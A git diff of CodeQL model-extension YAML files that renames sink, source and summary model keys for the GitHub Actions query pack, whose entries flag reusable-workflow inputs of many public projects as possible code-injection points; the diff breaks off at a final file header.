diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda5..acc5bf51e35 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d..c89d1c808c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a..0258c79e83f 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783..ebeba1eb226 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5..5f709385839 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe..e96dbba0699 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c..2a7a9afd5a6 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d16..5094422f3fe 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f..dff83745645 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3..88b68dc4ea7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830..18c6974c74f 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e15..561c3e15e64 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index feb68c4bdd7..961741f413f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index d3b779c1afa..985652a265b 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 6b0e733be17..3103913ab4f 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index cf9971e8524..b89c1307d2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index b3518a7a8ee..9e60cc61bb5 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index a60fba237ef..cac4e298538 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 37f2febb70f..eb2669a96ea 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 6e3d48dbf89..590e518d350 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 465fff41145..d55af595b1c 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 3f091f1c961..1fd6cd394bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index efa591f749d..3583052045b 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 4bd74701fde..f355ceee6da 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index 34d11e19946..2b9190c87af 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] - ["schemastore/schemastore/src/negative_test/github-workflow/reusable-workflow-input-must-declare-type.yaml", "*", "input.constraints", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index fb4a8248853..783ff3c0468 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index ef3af44da3a..de853d30588 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.ruby-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index a8c86c49d7c..31f09278ecd 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 40549844d38..d45a2e2a03a 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.test_filter", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index bd180d9b367..896400bf2f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 1e5721f1e7c..ade06c90c26 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] - ["softfever/orcaslicer/.github/workflows/build_deps.yml", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index b7a14240aed..f4c2d488ba3 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 1a276f8812f..8a11ced42d0 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index ef448c8f4c0..4c018b20f22 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index 6c672170025..315c85efeb6 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] - ["speedb-io/speedb/.github/workflows/build_macos_ARM.yml", "*", "input.verSion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index b7104a8b615..8a3132d5258 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index cd81a723906..9a669c8c009 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.python-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 1b2ce37480f..0ecb817822c 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["stdlib-js/stdlib/.github/workflows/lint_autofix.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 91889927c45..e4590eeec8b 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 8d4400bd3ea..ea0ddad0697 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 29c7e1bd3e2..9352f766e82 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/auth/.github/workflows/publish.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml index 109dce9df0d..d436644f4ac 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/supabase_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["supabase/cli/.github/workflows/mirror-image.yml", "*", "input.image", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml index e3643f0156b..c6c01abca90 100644 --- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "input.workflow_run", "code-injection", "generated"] - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "input.pull_request_number", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"] - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml index a4bba59b5a5..8a9f76e7e52 100644 --- a/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tgstation_tgstation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.map", "code-injection", "generated"] - ["tgstation/tgstation/.github/workflows/run_integration_tests.yml", "*", "input.minor", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml index d12982c35a4..8b3cfebc67b 100644 --- a/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml +++ 